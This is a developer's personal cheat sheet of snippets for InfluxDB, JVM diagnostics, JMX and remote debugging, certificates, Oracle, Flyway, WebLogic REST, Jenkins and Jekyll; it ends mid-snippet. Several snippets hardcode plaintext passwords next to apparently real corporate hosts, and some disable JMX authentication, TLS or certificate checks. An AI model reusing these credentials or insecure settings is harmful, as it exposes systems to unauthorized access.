INFLUX_PASS=my-pass-my-pass
INFLUX_BUCKET=my-bucket
INFLUX_CONFIG=my-local-config
INFLUX_URL=localhost:8086

influx setup --org myself-org --bucket $INFLUX_BUCKET --username $INFLUX_USER --password $INFLUX_PASS --force  
influx config list 
INFLUX_TOKEN=`cat /etc/influxdb2/influx-configs | grep "^  token =" | awk '{print $3}' | awk -F '"' '{print $2}'`
echo $INFLUX_TOKEN

if a setup already exists, it is not possible to run setup again

# INFLUX_TOKEN=my-secret-token
# INFLUX_CONFIG=my-local-config
# # influx config create --help
# influx config create --active \
#   -n $INFLUX_CONFIG \
#   -t $INFLUX_TOKEN \
#   -u http://localhost:8086 \
#   -o myself-org
# 
# # config list
# influx config --help
# influx config list 
# influx config rm $INFLUX_CONFIG

influx query

influx query via cli

# completion
eval $(influx completion bash)

# list of buckets
influx bucket list

# simple query
INFLUX_BUCKET=my-bucket
influx query "from(bucket:\"${INFLUX_BUCKET}\") |> range(start:-1m)" --raw
influx v1 shell
show databases
use my-bucket
# INSERT exampletable, field=1 field2=21 field3=test1, value=0.55 1472666050
# INSERT exampletable, field=1, field2=21 1593122400000000000
# INSERT exampletable,tag1=2 tag2=22 tag3=test2 1439856720000000000
# INSERT exampletable,tag1=3 tag2=23 tag3=test3 1439856000000000000
# 
# insert codenarc,maxPriority2Violations=917,maxPriority3Violations=3336 value=0.10 1593122400000000000
# insert codenarc,maxPriority2Violations=917,maxPriority3Violations=3336 value=0.10 1472666050
# 
# select * from exampletable;
# select * from temperature;

select * from foods;

influx query via curl

# show database 
curl --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded" -G "$INFLUX_URL/query?pretty=true" \
  --data-urlencode "q=SHOW DATABASES"

# show retention policy for specific database
curl --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded" -G "$INFLUX_URL/query?pretty=true" \
  --data-urlencode "db=${INFLUX_BUCKET}" \
  --data-urlencode "q=SHOW RETENTION POLICIES"

# show all data 
curl --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded" -G "$INFLUX_URL/query?pretty=true" \
  --data-urlencode "db=${INFLUX_BUCKET}" \
  --data-urlencode "q=SHOW MEASUREMENTS"

curl --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded" -G "$INFLUX_URL/query?pretty=true"

# show schema
curl --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded" -G "$INFLUX_URL/query?pretty=true" \
--data-urlencode "db=${INFLUX_BUCKET}" \
--data-urlencode "q=SHOW FIELD KEYS"
# insert data 
# --header "Content-Type: text"
curl -v --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded"  \
  -X POST -G "$INFLUX_URL/write?db=${INFLUX_BUCKET}&precision=s" \
  --data-urlencode "db=${INFLUX_BUCKET}" \
  --data-urlencode "temperature,location=1 value=90 1472666050"

curl -v --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded"  \
  -X POST -G "$INFLUX_URL/write?db=${INFLUX_BUCKET}&precision=s" \
  --data-urlencode "db=${INFLUX_BUCKET}" \
  --data-urlencode "temperature,location=1 value=91 1439856720000000000"
# select data 
curl --header "Authorization: Token $INFLUX_TOKEN" --header "Content-Type: application/x-www-form-urlencoded" -G "$INFLUX_URL/query?pretty=true" \
  --data-urlencode "db=${INFLUX_BUCKET}" \
  --data-urlencode "q=select * from foods"

# "q=SELECT * FROM \"events\" WHERE \"type\"='start' and \"applicationName\"='SessionIngestJob$' limit 10"  

curl -G 'http://tesla-influx.k8sstg.mueq.adas.intel.com/query?pretty=true' --data-urlencode "db=metrics" --data-urlencode "q=SELECT jobId FROM \"events\" limit 10"

delete record

curl --silent -G "https://dq-influxdb.dplapps.vantage.org:443/query?pretty=true" \
--data-urlencode "db=${INFLUX_BUCKET}" \
--data-urlencode "q=DROP SERIES FROM \"km-dr\" WHERE \"session\"='aa416-7dcc-4537-8045-83afa2' and \"vin\"='V77777'"
CREATE USER telegraf WITH PASSWORD 'telegrafmetrics' WITH ALL PRIVILEGES

java cheat sheet

links

java ecosystem applications

for quarkus & payara PID=1

command diagnostic request

jcmd $PID VM.flags
jcmd $PID VM.heap_info
jcmd $PID VM.system_properties

statistic over time

# print all options
jstat -options
# garbage collector statistic
jstat -gs $PID
jstat -gs -t $PID 5000 10 # each 5 sec, 10 times

Java process print thread stack traces

jstack $PID

system properties

jinfo $PID

heap dump, jmap

# find process id for target java process
ps auxf

# find amount of threads inside JVM
ps -eww H -p $JAVA_PROCESS_ID

# make heap dump
jmap -histo $JAVA_PROCESS_ID
jmap -clstats $JAVA_PROCESS_ID
jmap -heap $JAVA_PROCESS_ID
jmap -dump:format=b,live,file=$PATH_TO_OUTPUT_HEAP_DUMP $JAVA_PROCESS_ID

java repl java code evaluation

$JAVA_HOME/bin/jshell -v
import java.util.UUID;
UUID.randomUUID();

execute javascript code

#! /usr/bin/env jjs
print('start of the script');
var variableInScript = 5 * 3;
print(" output from script ${threeyr}");

execute script code

# inline
jrunscript -e "cat('https://google.com')"
# js repl
jrunscript
js> t = new java.lang.Thread(function() { print('java Thread in script\n'); })
js> t.start()

JVM parameters

-Xmx56000m 
-XX:+HeapDumpOnOutOfMemoryError 
-XX:HeapDumpPath=/usr/src/bin/log/ 
-XX:OnOutOfMemoryError=/usr/src/bin/start-app.sh
-XX:ErrorFile=/usr/src/bin/log/fatal-errors.log 
-XX:+PrintGCDetails 
-XX:+UseG1GC 
-Xloggc:/usr/src/bin/log/jvm-gc.log 

jps - java process status

jps -v

# process arguments
jps -m 

# Main class of the process
jps -l 

JMX java inspect java state java stuck

# command line argument
-Dcom.sun.management.jmxremote
-Dcom.sun.management.jmxremote.port=5006
-Dcom.sun.management.jmxremote.rmi.port=5006
-Djava.rmi.server.hostname=127.0.0.1 
-Dcom.sun.management.jmxremote.local.only=false
-Dcom.sun.management.jmxremote.authenticate=false
-Dcom.sun.management.jmxremote.ssl=false
# additional parameters
-Djmx.rmi.registry.port=5006 
-Djmx.rmi.port=5006
# OpenShift settings
# connect to openshift
$ oc login $OC_HOST:8443
 
# forward ports from localhost to pod
# oc port-forward $POD_NAME <local port>:<remote port>
$ oc port-forward $POD_NAME 5006
 
# e.g. connect to the jmx port with visual vm
visualvm --openjmx localhost:5006
jconsole localhost:5006

visualvm

set specific jdk

vim etc/visualvm.conf

visualvm_jdkhome="/home/my-user/.sdkman/candidates/java/18.0.1-oracle"

for connecting to jvm - select "new jmx connection"

java application debug, remote debug

java -jar ...

-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=5005
-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=localhost:5005

The Java image on OpenShift has built-in support for remote debugging

# environment variables
JAVA_DEBUG=true  
# or
oc set env dc/inventory JAVA_DEBUG=true

you can create SSH tunnel between your local machine and remote: ( execute next line from local machine )

ssh -L 7000:127.0.0.1:5005 $REMOTE_USER@$REMOTE_HOST

and your connection url will looks like: 127.0.0.1:7000
or
connect with local openshift client

# connect to openshift
$ oc login $OPENSHIFT_HOST:8443

# forward the jmx ports
$ oc port-forward $POD_NAME 5005

java application console debug headless debug

image

connect to process

jdb -attach localhost:5005
jdb -attach localhost:5005 -sourcepath :src/main/java/

commands inside debugger

# set breakpoint on line
stop at com.ubs.ad.data.interval.v2.IntervalServiceImpl:189
# set breakpoint on method
stop at com.ubs.ad.data.interval.v2.IntervalServiceImpl.getAvailability

# print list of breakpoints
clear  

# remove breakpoint 
clear com.ubs.ad.data.interval.v2.IntervalServiceImpl:189

# print local variables 
locals

# for all methods need to use full name of the class
print com.ubs.interval.IntervalValidator.isContributorIdValid(subscriber)
eval com.ubs.interval.IntervalValidator.isContributorIdValid(subscriber)

# print current stack trace, print position
where 

print intervalsIdList
dump intervalsIdList
set intervalsIdList=new ArrayList<>();

movements inside debugger

next                      -- step one line (step OVER calls)
cont                      -- continue execution from breakpoint

step                      -- execute current line ( step in )
step up                   -- execute until the current method returns to its caller
stepi                     -- execute current instruction

java agent

-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=9010
java -javaagent:<agent-path.jar>=<agent args> -jar <your-jar.jar>

attach to process, agent to pid, java agent

// Using com.sun.tools.attach.VirtualMachine:
VirtualMachine vm = VirtualMachine.attach(pid)
vm.loadAgent(jarPath, agentArgS)
vm.detach()

get current java version java runtime version

System.getProperty("java.runtime.version");

set proxy system properties

System.getProperties().put("http.proxyHost", "someProxyURL");
System.getProperties().put("http.proxyPort", "someProxyPort");

-Dhttp.proxyHost=127.0.0.1 -Dhttp.proxyPort=3128 -Dhttps.proxyHost=127.0.0.1 -Dhttps.proxyPort=3129
export _JAVA_OPTIONS="-Dhttp.proxyHost=127.0.0.1 -Dhttp.proxyPort=3128 -Dhttps.proxyHost=127.0.0.1 -Dhttps.proxyPort=3128 -Dhttp.nonProxyHosts=localhost|*.ubsgroup.net|*.zur -Dhttps.nonProxyHosts=localhost|*.ubsgroup.net|*.muc"

print all classes for running application

java -verbose:class -version
java -verbose:class --classpath:my.jar  ClassWithMain

certificates

create certificate

Browser.address url.lock(broken lock) -> Certificate -> Details -> Copy to File -> Base-64 encoded X.509 -> metrics.cer
# keytool -printcert -sslserver path.to.server.com:443
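alternatively, a sketch of fetching the server certificate without a browser ( host name is illustrative )

openssl s_client -connect path.to.server.com:443 -servername path.to.server.com </dev/null 2>/dev/null \
  | openssl x509 -outform PEM > metrics.cer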

read certificate

openssl x509 -text -noout -in elastic-staging.cer 

import certificate to truststore

ls myTrustStore && rm myTrustStore;
CERT_FILE=metrics.cer
keytool -printcert -rfc -file $CERT_FILE
keytool -printcert -file $CERT_FILE

CERT_ALIAS=metrics
TRUST_STORE=myTrustStore
keytool -import -file $CERT_FILE -alias $CERT_ALIAS -keystore $TRUST_STORE

# list of certificates in truststore, jks keystore info
keytool -list -keystore $TRUST_STORE

# export and print certificate
keytool -exportcert -keystore $TRUST_STORE -alias $CERT_ALIAS -file out.crt
keytool -printcert -file out.crt

create empty truststore

TRUST_STORE=emptyStore
ls $TRUST_STORE && rm $TRUST_STORE;
CERT_ALIAS=garbage
STORE_PASS="my_pass"

# create truststore with one record
keytool -genkeypair -alias $CERT_ALIAS -storepass $STORE_PASS -keypass secretPassword -keystore $TRUST_STORE -dname "CN=Developer, OU=Department, O=Company, L=City, ST=State, C=CA"
# list of records
keytool -list -keystore $TRUST_STORE -storepass $STORE_PASS
## delete records
keytool -delete -alias $CERT_ALIAS -storepass $STORE_PASS -keystore $TRUST_STORE
# list of records 
keytool -list -keystore $TRUST_STORE -storepass $STORE_PASS

execute application from java, execute sub-process, start program

start and waiting for finish

new ProcessExecutor().commandSplit(executeLine).execute();

start in separate process without waiting

new ProcessExecutor().commandSplit(executeLine).start();

with specific directory

new ProcessExecutor().commandSplit(executeLine).directory(executableFile.getParentFile()).start();

@Null

use Optional.absent

locking

ReentrantLock ~ binary Semaphore ( mutex ), but with ownership and reentrancy

jshell

print import

/!

help

/help
/?

exit

/exit

JAR

create jar based on compiled files

jar cf WC2.jar *.class

take a look into jar, list all files into jar

jar tvf WC2.jar

print loaded classes during start application

java -verbose app

Security

collaboration with underlying system javacallbacks

LOG4j

log4j configuration key for JVM

-Dlog4j.configuration={path to file}

log4j override configuration from code

Properties props = new Properties();
props.put("log4j.rootLogger", level+", stdlog");
props.put("log4j.appender.stdlog", "org.apache.log4j.ConsoleAppender");
props.put("log4j.appender.stdlog.target", "System.out");
props.put("log4j.appender.stdlog.layout", "org.apache.log4j.PatternLayout");
props.put("log4j.appender.stdlog.layout.ConversionPattern","%d{HH:mm:ss} %-5p %-25c{1} :: %m%n");
// Execution logging
props.put("log4j.logger.com.hp.specific", level);
// Everything else 
props.put("log4j.logger.com.hp", level);
LogManager.resetConfiguration();
PropertyConfigurator.configure(props);

log4j file configuration

<?xml version="1.0" encoding="UTF-8"?>
    <Configuration status="WARN">
      <Appenders>
        <Console name="Console" target="SYSTEM_OUT">
          <PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
        </Console>
      </Appenders>
      <Loggers>
        <Logger name="com.foo.Bar" level="debug">
          <AppenderRef ref="Console"/>
        </Logger>
        <Root level="debug">
          <AppenderRef ref="Console"/>
        </Root>
      </Loggers>
    </Configuration>

log4j update configuration during runtime, refresh configuration

<?xml version="1.0" encoding="UTF-8"?>
<Configuration monitorInterval="30">
...
</Configuration>

Oracle connection

// METHOD #1 - Using no service
String dbURL1 = "jdbc:oracle:thin:ubs_client_connect_check/[email protected]:1530:tstdha01";
conn1 = DriverManager.getConnection(dbURL1);
if (conn1 != null) {
    conn1.setClientInfo("OCSID.MODULE", "Connection 1 - NO Service");
    Statement stmt1 = conn1.createStatement();
    stmt1.execute("select 1 from dual");
}


// METHOD #2 - using the service
String dbURL2 = "jdbc:oracle:thin:ubs_client_connect_check/mypassword@//tldr.ubsgroup.net:1530/pdb_tstdha01.UBS";
conn2 = DriverManager.getConnection(dbURL2);
if (conn2 != null) {
    conn2.setClientInfo("OCSID.MODULE", "Connection 2 - Service");
    Statement stmt2 = conn2.createStatement();
    stmt2.execute("select 1 from dual");
}


// METHOD #3 - using tns entry
String dbURL3 = "jdbc:oracle:oci:@tldr01";
Properties properties = new Properties();
properties.put("user", "ubs_client_connect_check");
properties.put("password", "password");
properties.put("defaultRowPrefetch", "20");
conn3 = DriverManager.getConnection(dbURL3, properties);


// METHOD #4 - using LDAP
// jdbc:oracle:thin:@ldap://oraid1.zur:389/orainv,cn=oraclecontext,dc=zur,dc=ubs,dc=de ldap://oraid2.zur:389/orainv,cn=oraclecontext,dc=zur,dc=ubs,dc=de

hsqldb Oracle dialect

driverClassName="org.hsqldb.jdbc.JDBCDriver"
url="jdbc:hsqldb:mem:test;sql.syntax_ora=true"
username="sa" password=""

liquibase


liquibase print sql scripts ( update sql )

java -jar C:\soft\maven-repo\org\liquibase\liquibase-core\3.4.1\liquibase-core-3.4.1.jar  \
--driver=oracle.jdbc.OracleDriver --classpath=C:\soft\maven-repo\com\oracle\ojdbc6\11.2.0.2.0\ojdbc6-11.2.0.2.0.jar  \
--changeLogFile=C:\temp\liquibase\brand-server\master.xml  \
--contexts="default" \
--url=jdbc:oracle:thin:@q-ora-db-scan.wirecard.sys:1521/stx11de.wirecard --username=horus_user_cherkavi --password=horus_user_cherkavi \
 updateSQL > script.sql

liquibase test scripts against H2 database

java -jar liquibase-core-3.5.5.jar  --driver=org.h2.Driver --classpath=h2-1.4.197.jar --changeLogFile=C:\project\opm\opm-persistence\src\main\resources\db\changelog\changes.xml --url=jdbc:h2:mem:testdb;Mode=Oracle --username=sa --password=  update

flyway

image

  • In database Flyway operates with "schema_version" table only ( no knowledge about the rest of DB, doesn't make scan of the DB .... )
  • SQL files: SQL.DDL and/or SQL.DML
  • Manual changes SQL.DML is not dangerous
  • Manual changes SQL.DDL is dangerous commandline documentation

folder structure

/-<root>
  /drivers
  /jars
  /scripts
  /sql

execute flyway from commandline, db info

java -cp flyway-core-4.0.3.jar;flyway-commandline-5.1.3.jar org.flywaydb.commandline.Main -configFile=flyway-info.conf info

to see debug log, need to add next jars into classpath:

  • slf4j-api-1.7.25.jar
  • log4j-to-slf4j-2.10.0.jar
  • log4j-core-2.10.0.jar
  • log4j-api-2.10.0.jar
  • log4j-1.2.14.jar

slf4j logging

lib/log4j-core-2.11.0.jar:\
lib/log4j-api-2.11.0.jar:\
lib/log4j-slf4j-impl-2.11.0.jar:\

and execute

java -Dlog4j2.debug=true 

config file example

flyway.driver=oracle.jdbc.OracleDriver
flyway.url=jdbc:oracle:thin:@vpn050.kabel.de:1523:PMDR
flyway.user=login
flyway.password=pass
flyway.locations=filesystem:../fixnet-data/,classpath:db.migration.initialize

execute flyway with command line parameters

flyway migrate -driver=oracle.jdbc.OracleDriver -url=jdbc:oracle:thin:@vs050:1523:PMDR -user=xnet -password=xnet -locations=filesystem:/opt/oracle/scripts

flyway table with current migration status

select * from {schema name}."schema_version";

update schema name with "success" flag

update {schema name}."schema_version" set "success"=1 where "version"='3.9'; 

update from java code, custom update from code,

package db.migration.initialize;
import java.sql.Connection;
import org.flywaydb.core.api.migration.jdbc.JdbcMigration;
public class V1_9_9__insert_initial_gui_configurations implements JdbcMigration {
    @Override
    public void migrate(Connection connection) throws Exception {
        // custom data migration logic goes here
    }
}
<location>classpath:db.migration.initialize</location>

flyway crc generation flyway control sum generator

    public static int calculateSum(String filePath) {

        final CRC32 crc32 = new CRC32();
 
        try (BufferedReader bufferedReader = new BufferedReader(new FileReader(new File(filePath))); ) {
            String line = null;
            while ((line = bufferedReader.readLine()) != null) {
		    line = BomFilter.FilterBomFromString(line);
	            crc32.update(StringUtils.trimLineBreak(line).getBytes(StandardCharsets.UTF_8));
            }
        } catch (IOException e) {
            System.err.printf("Error while trying to calculate CRC for file %s: %s\n", filePath, e.getMessage());
            System.exit(1);
        }
 
        int checksum = (int) crc32.getValue();
        return checksum;
    }

JNDI datasource examples:

   <Resource name="ds/JDBCDataSource" auth="Container"
              type="javax.sql.DataSource" 
              driverClassName="org.h2.Driver"
              url="jdbc:h2:~/testdb;Mode=Oracle"
              username="sa" 
              password="" maxActive="20" maxIdle="10"
              maxWait="-1"/>

   <Resource name="ds/JDBCDataSource" auth="Container"
              type="javax.sql.DataSource" 
              driverClassName="org.hsqldb.jdbc.JDBCDriver"
              url="jdbc:hsqldb:mem:test;sql.syntax_ora=true"
              username="sa" 
              password="sa" maxActive="20" maxIdle="10"
              maxWait="-1"/>

WildFly

check health of application

<host:port>/<application>/node
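a sketch of calling it ( host, port and application name are illustrative )

curl -s http://localhost:8080/my-application/node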

Java Testing

insert private fields

ReflectionUtils.makeAccessible(id);
ReflectionUtils.setField(id, brand, "myNewId");

order of tests execution

@FixMethodOrder

rest testing

RestAssured
body("brands.size()")

Sonar

skip checking by code checker

// NOSONAR
@java.lang.SuppressWarnings("squid:S3655")
  -Dsonar.projectVersion=${{ env.POM_PROJECT_VERSION }}
            -Dsonar.projectKey=${{ env.SONAR_PROJECT_KEY }}
            -Dsonar.branch.name=${{ steps.extract_branch.outputs.branch }}
            -Dsonar.language=java 
            -Dsonar.java.source=17
            -Dsonar.exclusions=**/*DTO.java,**/exception/**/*.java,**/serdes/*.java,src/main/python/**
            -Dsonar.java.binaries=target
            -Dsonar.java.sources=src/main/java
            -Dsonar.sources=src/main
            -Dsonar.java.tests=src/test/java
            -Dsonar.coverage.jacoco.xmlReportPaths=target/jacoco-report/jacoco.xml

Hibernate

@Modifying

for custom queries only

force joining

@WhereJoinTable

inheritance types

- table per hierarchy ( SINGLE_TABLE )
- table per sub-class ( JOINED )
- table per class ( TABLE_PER_CLASS )

BPMN

Vaadin

show frame

    void showFrame(File file){
        Window window = new Window();
        window.setWidth("90%");
        window.setHeight("90%");
        BrowserFrame e = new BrowserFrame("PDF File", new FileResource(file));
        e.setWidth("100%");
        e.setHeight("100%");
        window.setContent(e);
        window.center();
        window.setModal(true);
        UI.getCurrent().addWindow(window);
    }

debug window

http://localhost:8090/?debug

Derby

into 'bin' folder add two variables for all scripts:

 export DERBY_INSTALL=/dev/shm/db/db-derby-10.14.2.0-bin/ 
 export DERBY_HOME=/dev/shm/db/db-derby-10.14.2.0-bin/ 

start with listening all incoming request ( not from localhost )

./startNetworkServer -h vldn338

create DB before using, from jdbc url

jdbc:derby://vldn338:1527/testDB;create=true

maven dependency

<dependency>
    <groupId>org.apache.derby</groupId>
    <artifactId>derbyclient</artifactId>
    <version>10.14.2.0</version>
</dependency>

jdbc

Driver: org.apache.derby.jdbc.ClientDriver
jdbc: jdbc:derby://vldn338:1527/dbName
user: <empty>
pass: <empty>

Activiti

create/init DB

activiti-engine-x.x.x.jar/org/activiti/db/create/activiti.create.sql

email, e-mail, smtp emulator

FakeSMTP

java -jar fakeSMTP.jar --help

run example:

java -jar fakeSMTP.jar -s -b -p 2525 -a 127.0.0.1  -o output_directory_name 

e-mail server smtp, pop3, imap with SSL

MailServer

java -Dgreenmail.smtp.hostname=0.0.0.0 -Dgreenmail.smtp.port=2525 -Dgreenmail.pop3.hostname=0.0.0.0 -Dgreenmail.pop3.port=8443 -Dgreenmail.users=Vitali.Cherkashyn:[email protected],user:[email protected] -jar  greenmail-standalone-1.5.7.jar 

WebLogic REST management

using REST services


list of all DataSources:

curl -X GET http://host:7001/management/wls/latest/datasources

return all accessible parameters for request

curl -X OPTION http://host:7001/management/wls/latest/datasources

request with authentication ( where magic string is "username:password" in base64 )

curl -H "Authorization: Basic d2VibG9naWM6d2VibG9naWMx" -X GET http://host:7001/management/wls/latest/datasources

request with authentication

curl --user username:password -X GET http://host:7001/management/wls/latest/datasources

description of one DataSource:

curl -X GET http://host:7001/management/wls/latest/datasources/id/{datasourceid}

domain runtime

curl --user weblogic:weblogic1  -X GET http://host:7001/management/weblogic/latest/domainRuntime

server parameters, server folders, server directories, server status, server classpath

curl --user weblogic:weblogic1  -X GET http://host:7001/management/weblogic/latest/domainRuntime/serverRuntimes

list of deployments

curl -v --user weblogic:weblogic1 -H X-Requested-By:MyClient -H Accept:application/json -X GET http://host:7001/management/wls/latest/deployments

list of applications

curl --user weblogic:weblogic1 -H Accept:application/json -X GET http://host:7001/management/wls/latest/deployments/application

info about one application

curl --user weblogic:weblogic1 -H Accept:application/json -X GET http://host:7001/management/wls/latest/deployments/application/id/userappname-gui-2018.02.00.00-SPRINT-7

remove application, undeploy application, uninstall application

curl --user weblogic:weblogic1 -H X-Requested-By:weblogic -H Accept:application/json -X DELETE http://host:7001/management/wls/latest/deployments/application/id/userappname-gui-2018.02.00.00-SPRINT-7

deploy application

curl -X POST --user weblogic:weblogic1 -H X-Requested-By:weblogic -H Accept:application/json -H Content-Type:application/json [email protected] http://host:7001/management/wls/latest/deployments/application
{
    "name":"userappname-gui-2018.02.00.00-SPRINT-7"
   ,"deploymentPath":"/opt/oracle/domains/pportal_dev/binaries/userappname-gui-2018.02.00.00-SPRINT-7.war"
   , "targets": ["pportal_group"]
}
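a minimal follow-up check ( reusing the endpoints and credentials from above ) to confirm the application was registered after the POST:

# list applications again and look for the newly deployed one
curl --user weblogic:weblogic1 -H Accept:application/json -X GET http://host:7001/management/wls/latest/deployments/application | grep userappname-gui-2018.02.00.00-SPRINT-7
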
OpenXava create new project from DataSource
	1 - switch to workspace %OPENXAVA%/workspace
	2 - open project OpenXavaTemplate
	3 - execute ant script: CreateNewProject.xml
	4 - enter name of project (Monolith) 
	5 - import new project into workspace ( import existing project )
	6 - replace dialect - %OPENXAVA%/workspace/Monolith/persistence/hibernate.cfg.xml
	7 - replace dialect - %OPENXAVA%/workspace/Monolith/persistence/META-INF/persistence.xml
	8 - create hibernate mapping from Database ( by JBoss tool )
	8.1 - create Hibernate console
	8.2 - create Hibernate Code Generation Configuration
	8.3 - run Hibernate Code Generation Configuration
	9 - add annotations:
	9.1 - add import to each Domain file: 
		import javax.persistence.*;
		import org.openxava.annotations.*;
	9.2 - add annotations to each column:
 	    @Id
	    // GeneratedValue(strategy=GenerationType.AUTO)
	    @Hidden
	    @Column(name = "value_id", length=36, nullable = false)
	    private String valueId;
	
    	    @Required
    	    @Column(name = "group", length = 20, nullable = false)
	    private String group;
	
	10 - add openxava annotations to each Entity:
	11 - execute ant compile ( %OPENXAVA%/workspace/Monolith/  )
	12 - execute ant deployWar ( %OPENXAVA%/workspace/Monolith/  )
	13 - execute tomcat
	14 - goto 
		http://localhost:8080/Monolith/modules/Value
		<     tomcat   path ><Project >       < entity name >

Version differences

java 8 to 9

JavaScript

Typescript cheat sheet

start new typescript application

### create folder
mkdir sandbox-typescript
cd sandbox-typescript

# init npm 
npm init

# sudo apt install node-typescript
tsc --init
# {
#   "compilerOptions": {
#     "target": "es6",
#     "module": "commonjs",
#     "esModuleInterop": true,
#     "moduleResolution": "node",
#     "sourceMap": true,
#     "noImplicitAny": false,
#     "outDir": "dist"
#   },
#   "lib": ["es2015"]
# }
vim tsconfig.json


### install dependencies
## typescript should have the same version as `tsc --version` - e.g. 3.8.3
npm install -D typescript
npm install -D tslint
## local server 
npm install -S express
npm install -D @types/express
## custom libraries 
npm install -D json-bigint
npm install -D bignumber.js

# tslint init
./node_modules/.bin/tslint --init

# "rules": {"no-console": false},
vim tslint.json

# "start": { "tsc && node dist/app.js", ...
vim package.json

### application start point
# import express from 'express';
# const app = express();
# const port = 3000;
# app.get('/', (req, res) => {res.send('up and running');});
# app.listen(port, () => {console.error(`server started on port ${port}`);});

mkdir src
vim src/app.ts

# start app
npm start

Terminal sh/bash replacement

npm install -g bun
import { $ } from "bun";

const output = await $`ls *.js`.arrayBuffer();

JS Obfuscator

npm install --save-dev javascript-obfuscator

javascript-obfuscator input_file_name.js [options]
javascript-obfuscator input_file_name.js --output output_file_name.js [options]

translate yaml/markdown/liquid to html pages; transform your plain text into static websites and blogs.

Other static sites generators, blogging tool

Jekyll Templates

Template language Liquid

Templates for dynamic web page creation

How to start with Jekyll

git clone https://github.com/sharu725/online-cv.git
cd online-cv
# Start Jekyll like: docker run ...
x-www-browser localhost:9090

Start Jekyll

Manual installation

sudo apt install bundler jekyll
bundle add webrick

### check versions 
ruby --version
# ruby 3.1.1p18
gem --version
# 3.3.25
DOCKER_IMG_NAME=jekyll/jekyll
DOCKER_IMG_TAG=3.8
# DOCKER_IMG_TAG=3.9.3
# DOCKER_IMG_TAG=latest
DOCKER_JEKYLL=jekyll

# start server with caching gem's
docker run --rm --name $DOCKER_JEKYLL --volume="$PWD:/srv/jekyll:Z" --volume="$PWD/vendor/bundle:/usr/local/bundle:Z" --publish [::1]:4000:4000 $DOCKER_IMG_NAME:$DOCKER_IMG_TAG jekyll serve --force_polling
# connect to running container 
# docker exec -it `docker ps | grep jekyll/jekyll | awk '{print $1}'` /bin/sh
x-www-browser http://localhost:4000


wkhtmltopdf 

docker-compose start

version: "2"
services:
  jekyll:
      image: jekyll/jekyll:3.9.3
      command: jekyll serve --force_polling
      ports:
          - 4000:4000
      volumes:
          - .:/srv/jekyll
          - ./vendor/bundle:/usr/local/bundle
      environment:
        JEKYLL_UID: 1001
        JEKYLL_GID: 1001

jekyll commands

# create new source folder
jekyll new my-cv

# build web pages
jekyll build

# bundle exec jekyll serve
jekyll serve
jekyll serve --force_polling --livereload
x-www-browser localhost:4000

possible issues

  • `require': cannot load such file -- webrick

    # gem install webrick # didn't work
    bundle add webrick
    bundle exec jekyll serve
  • ‘ruby3.0’: No such file or directory

    ❯ jekyll build
    /usr/bin/env: ‘ruby3.0’: No such file or directory
    ll /usr/bin/ruby3.0
    ln -s /usr/bin/ruby3.2 /usr/bin/ruby3.0

Jenkins cheat sheet

Deployment strategies:

  • Delivery ( needs approval from a human )
  • Deployment ( Continuous ) = Delivery (auto approve) + Automation + Event (time,commits,tag...)

links

alternatives

alternatives in cloud ( SaaS )

DSL

installation on debian

installation master-slave

master-slave
master-slave master-slave creation process for OCP
master-slave-ocp-creation

manual clean up

rm -rf .jenkins/caches/*
rm -rf .jenkins/workspace/*

manual start manual installation

jenkins manual how to
jenkins war
jenkins war download
jenkins docker image
jenkins docker documentation

java -jar jenkins.war --httpPort=8080 --useJmx 
~/.jenkins/secrets/

how to know version

check config.xml in the Jenkins home directory ( /var/lib/jenkins or /opt/webconf/var/lib/jenkins ), e.g. <version>1.599</version>
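
a running instance also reports its version in the X-Jenkins HTTP response header ( quick check, assuming $JENKINS_URL points to the instance as in the "connect to jenkins" section below ):

curl -sI $JENKINS_URL/login | grep -i x-jenkins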

restart jenkins

  • {jenkins-url}/safeRestart
  • {jenkins-url}/restart
  • java -jar /var/cache/jenkins/war/WEB-INF/jenkins-cli.jar -s {jenkins-url} safe-restart

stop jenkins

{jenkins-url}/exit

connect to jenkins

JENKINS_HOST=jenkins-stg.vantage.com
JENKINS_USER=cherkavi

JENKINS_URL=https://$JENKINS_HOST
# curl -Lv $JENKINS_URL/login 2>&1  | grep -i 'cli-port'
# wget $JENKINS_URL/jnlpJars/jenkins-cli.jar
java -jar jenkins-cli.jar -noCertificateCheck -s $JENKINS_URL help

java -jar jenkins-cli.jar -s $JENKINS_URL -webSocket -auth $JENKINS_USER:$JENKINS_API_TOKEN help
java -jar jenkins-cli.jar -s $JENKINS_URL -noCertificateCheck -auth $JENKINS_USER:$JENKINS_API_TOKEN help

connect via ssh

curl -Lv $JENKINS_URL/login 2>&1  | grep -i 'x-ssh-endpoint'
# security settings: add public ssh 
# $JENKINS_URL/user/$JENKINS_USER/configure -> SSH Public Keys

# x-jenkins-cli-port: 50000
ssh -l $JENKINS_USER -p 50000 $JENKINS_HOST help

java -jar jenkins-cli.jar -s $JENKINS_URL -ssh -user $JENKINS_USER -i ~/.ssh/id_rsa -logger FINE

collaboration between steps, passing data between steps

  1. Set an environment variable ( export myenv=value1 ) and read it in a later step
  2. print the value to a file ( echo $START > env_start.txt ) and read it back afterwards ( START=$(cat env_start.txt) ); see the sketch below
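
a minimal sketch of the file-based variant ( hypothetical values; the two parts run as separate sh steps sharing the same workspace ):

# earlier step: capture a value for later use
START=$(date +%s)
echo $START > env_start.txt

# later step, same workspace: read the value back
START=$(cat env_start.txt)
echo "pipeline started at $START"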

Script Console ( Manage Jenkins )

Thread.getAllStackTraces().keySet().each() {
  t -> if (t.getName()=="YOUR THREAD NAME" ) {   t.interrupt();  }
}
Jenkins.instance.getItemByFullName("Brand Server/develop").getBuildByNumber(614).finish(hudson.model.Result.ABORTED, new java.io.IOException("Aborting build"));
Jenkins.instance.getItemByFullName("Brand Server/develop").getBuildByNumber(614).doKill();

jenkins simple pipeline

node {
 	stage("Step #1") {
		echo "first bite"
	}

